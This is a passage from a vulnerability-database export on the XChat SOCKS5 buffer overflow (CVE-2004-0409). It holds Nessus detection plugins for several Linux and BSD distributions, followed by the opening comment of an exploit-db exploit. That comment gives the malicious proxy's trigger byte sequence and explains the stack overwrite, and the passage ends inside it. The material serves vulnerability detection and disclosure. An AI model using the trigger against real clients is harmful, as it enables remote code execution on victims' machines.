from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and 
contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(12624);\n script_version(\"$Revision: 1.9 $\");\n script_cve_id(\"CVE-2004-0409\");\n\n script_name(english:\"FreeBSD : xchat remotely exploitable buffer overflow (Socks5) (204)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: xchat2');\nscript_set_attribute(attribute: 'cvss_vector', value: 'CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P');\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 
'http://aluigi.altervista.org/adv/live555x-adv.txt\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-01.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-02.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-03.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-04.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-05.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-06.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-07.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-08.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-09.html\nhttp://www.mozilla.org/security/announce/mfsa2005-47.html\nhttp://xchat.org/files/source/2.0/patches/xc208-fixsocks5.diff');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/8338a20f-9573-11d8-9366-0020ed76ef5a.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/06\");\n script_end_attributes();\n script_summary(english:\"Check for xchat2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #37503 (freebsd_pkg_8338a20f957311d893660020ed76ef5a.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=7;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"xchat2>=1.8<2.0.8_2\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-07T11:51:21", "description": "A remotely exploitable vulnerability was discovered in the Socks-5\nproxy code in XChat. 
By default, socks5 traversal is disabled, and one\nwould also need to connect to an attacker's own custom proxy server in\norder for this to be exploited. Successful exploitation could lead to\narbitrary code execution as the user running XChat.\n\nThe provided packages are patched to prevent this problem.", "edition": 25, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : xchat (MDKSA-2004:036)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:xchat", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "p-cpe:/a:mandriva:linux:xchat-python", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:xchat-tcl", "p-cpe:/a:mandriva:linux:xchat-perl"], "id": "MANDRAKE_MDKSA-2004-036.NASL", "href": "https://www.tenable.com/plugins/nessus/14135", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:036. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14135);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0409\");\n script_xref(name:\"MDKSA\", value:\"2004:036\");\n\n script_name(english:\"Mandrake Linux Security Advisory : xchat (MDKSA-2004:036)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remotely exploitable vulnerability was discovered in the Socks-5\nproxy code in XChat. 
By default, socks5 traversal is disabled, and one\nwould also need to connect to an attacker's own custom proxy server in\norder for this to be exploited. Successful exploitation could lead to\narbitrary code execution as the user running XChat.\n\nThe provided packages are patched to prevent this problem.\"\n );\n # http://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?591f5f7f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xchat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xchat-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xchat-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xchat-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 
audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"xchat-2.0.7-6.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"xchat-perl-2.0.7-6.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"xchat-python-2.0.7-6.1.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"xchat-tcl-2.0.7-6.1.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", reference:\"xchat-2.0.4-7.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"xchat-perl-2.0.4-7.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"xchat-python-2.0.4-7.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", reference:\"xchat-tcl-2.0.4-7.1.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:51:49", "description": "The remote host is affected by the vulnerability described in GLSA-200404-15\n(XChat 2.0.x SOCKS5 Vulnerability)\n\n The SOCKS 5 proxy code in XChat is vulnerable to a remote exploit.\n Users would have to be using XChat through a SOCKS 5 server, enable\n SOCKS 5 traversal which is disabled by default and also connect to an\n attacker's custom proxy server.\n \nImpact :\n\n This vulnerability may allow an 
attacker to run arbitrary code within\n the context of the user ID of the XChat client.\n \nWorkaround :\n\n A workaround is not currently known for this issue. All users are\n advised to upgrade to the latest version of the affected package.", "edition": 24, "published": "2004-08-30T00:00:00", "title": "GLSA-200404-15 : XChat 2.0.x SOCKS5 Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "modified": "2004-08-30T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:xchat", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200404-15.NASL", "href": "https://www.tenable.com/plugins/nessus/14480", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200404-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14480);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0409\");\n script_xref(name:\"GLSA\", value:\"200404-15\");\n\n script_name(english:\"GLSA-200404-15 : XChat 2.0.x SOCKS5 Vulnerability\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200404-15\n(XChat 2.0.x SOCKS5 Vulnerability)\n\n The SOCKS 5 proxy code in XChat is vulnerable to a remote exploit.\n Users would have to be using XChat through a SOCKS 5 server, enable\n SOCKS 5 traversal 
which is disabled by default and also connect to an\n attacker's custom proxy server.\n \nImpact :\n\n This vulnerability may allow an attacker to run arbitrary code within\n the context of the user ID of the XChat client.\n \nWorkaround :\n\n A workaround is not currently known for this issue. All users are\n advised to upgrade to the latest version of the affected package.\"\n );\n # http://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?591f5f7f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200404-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All XChat users should upgrade to the latest stable version:\n # emerge sync\n # emerge -pv '>=net-irc/xchat-2.0.8-r1'\n # emerge '>=net-irc/xchat-2.0.8-r1'\n Note that users of the gtk1 version of xchat (1.8.*) should upgrade to\n xchat-1.8.11-r1:\n # emerge sync\n # emerge -pv '=net-irc/xchat-1.8.11-r1'\n # emerge '=net-irc/xchat-1.8.11-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xchat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-irc/xchat\", unaffected:make_list(\"ge 2.0.8-r1\"), vulnerable:make_list(\"lt 2.0.8-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"net-irc/xchat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:05:21", "description": "An updated xchat package that fixes a stack-based buffer overflow in\nthe SOCKSv5 proxy code.\n\nX-Chat is a graphical IRC chat client for the X Window System.\n\nA stack-based buffer overflow has been fixed in the SOCKSv5 proxy\ncode. An attacker could create a malicious SOCKSv5 proxy server in\nsuch a way that X-Chat would execute arbitrary code if a victim\nconfigured X-Chat to use the proxy. 
The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CVE-2004-0409\nto this issue.\n\nUsers of X-Chat should upgrade to this erratum package, which contains\na backported security patch, and is not vulnerable to this issue.", "edition": 26, "published": "2004-11-04T00:00:00", "title": "RHEL 2.1 / 3 : xchat (RHSA-2004:585)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "modified": "2004-11-04T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:xchat"], "id": "REDHAT-RHSA-2004-585.NASL", "href": "https://www.tenable.com/plugins/nessus/15633", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:585. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15633);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0409\");\n script_xref(name:\"RHSA\", value:\"2004:585\");\n\n script_name(english:\"RHEL 2.1 / 3 : xchat (RHSA-2004:585)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated xchat package that fixes a stack-based buffer overflow in\nthe SOCKSv5 proxy code.\n\nX-Chat is a graphical IRC chat client for the X Window System.\n\nA stack-based buffer overflow has been fixed in the SOCKSv5 proxy\ncode. An attacker could create a malicious SOCKSv5 proxy server in\nsuch a way that X-Chat would execute arbitrary code if a victim\nconfigured X-Chat to use the proxy. 
The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CVE-2004-0409\nto this issue.\n\nUsers of X-Chat should upgrade to this erratum package, which contains\na backported security patch, and is not vulnerable to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0409\"\n );\n # http://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?591f5f7f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:585\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xchat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xchat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/11/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(2\\.1|3)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:585\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"xchat-1.8.9-1.21as.2\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"xchat-2.0.4-4.EL\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + 
redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xchat\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:46:41", "description": "A straightforward stack-based buffer overflow exists in XChat's Socks5 proxy\nsupport.\n\nThe XChat developers report that `tsifra' discovered this issue.\n\nNOTE: XChat Socks5 support is disabled by default in the FreeBSD Ports\nCollection.", "edition": 26, "published": "2009-04-23T00:00:00", "title": "FreeBSD : xchat remotely exploitable buffer overflow (Socks5) (8338a20f-9573-11d8-9366-0020ed76ef5a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0409"], "modified": "2009-04-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:xchat2"], "id": "FREEBSD_PKG_8338A20F957311D893660020ED76EF5A.NASL", "href": "https://www.tenable.com/plugins/nessus/37503", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37503);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0409\");\n\n script_name(english:\"FreeBSD : xchat remotely exploitable buffer overflow (Socks5) (8338a20f-9573-11d8-9366-0020ed76ef5a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A straightforward stack-based buffer overflow exists in XChat's Socks5 proxy\nsupport.\n\nThe XChat developers report that `tsifra' discovered this issue.\n\nNOTE: XChat Socks5 support is disabled by support in 
the FreeBSD Ports\nCollection.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://xchat.org/files/source/2.0/patches/xc208-fixsocks5.diff\"\n );\n # http://marc.theaimsgroup.com/?l=xchat-announce&m=108114935507357\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=xchat-announce&m=108114935507357\"\n );\n # https://vuxml.freebsd.org/freebsd/8338a20f-9573-11d8-9366-0020ed76ef5a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fe1a9d02\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:xchat2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/04/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"xchat2>=1.8<2.0.8_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T12:07:08", "description": "XChat 1.8.0/2.0.8 socks5 Remote Buffer overflow Exploit. CVE-2004-0409. Remote exploit for linux platform", "published": "2004-05-05T00:00:00", "type": "exploitdb", "title": "XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0409"], "modified": "2004-05-05T00:00:00", "id": "EDB-ID:296", "href": "https://www.exploit-db.com/exploits/296/", "sourceData": "/*[ X-Chat[v1.8.0 - v2.0.8]: socks-5 remote buffer overflow exploit. ] *\r\n * *\r\n * by: vade79/v9 v9 fakehalo deadpig org (fakehalo/realhalo) *\r\n * *\r\n * X-Chat homepage: *\r\n * http://www.xchat.org *\r\n * *\r\n * compile: *\r\n * cc xxchat-socks5.c -o xxchat-socks5 *\r\n * *\r\n * trigger bug/workings(X-Chat socks-5 comminucation): *\r\n * 0x05,0x00 *\r\n * 0x05,0x00,0x00,0x03 *\r\n * 0x?? (the size of the following \"data\", 255MAX(char/int8)) *\r\n * 0x??,0x??,0x?? ... (\"data\") *\r\n * *\r\n * ie. 
\"\\x05\\x00\\x05\\x00\\x00\\x03\\xffxxxxxxxxxxxxxxxxxxxxxxxxxxxx...\" *\r\n * *\r\n * the \"data\", limited by the previous byte, is then copied into a *\r\n * 10 byte buffer labeled buf[]. the idea is to set the size of *\r\n * the incoming data to a larger size than expected(ie. 0xff/255MAX), *\r\n * followed by sending that amount of data to exceed the 10 byte *\r\n * buffer boundary and overwrite memory addresses(stack based). *\r\n * *\r\n * the problem with the size limit is that it is defined in one *\r\n * character(char/int8), making a maximum of up to 255 bytes to be *\r\n * written to buf[]. so, this only leaves about ~100+ nops breathing *\r\n * room per offset. another problem is that the location of the *\r\n * shellcode depends on where/what X-Chat has already done. those *\r\n * two things together make for a very unpractical \"in the wild\" *\r\n * exploit scenario. *\r\n * 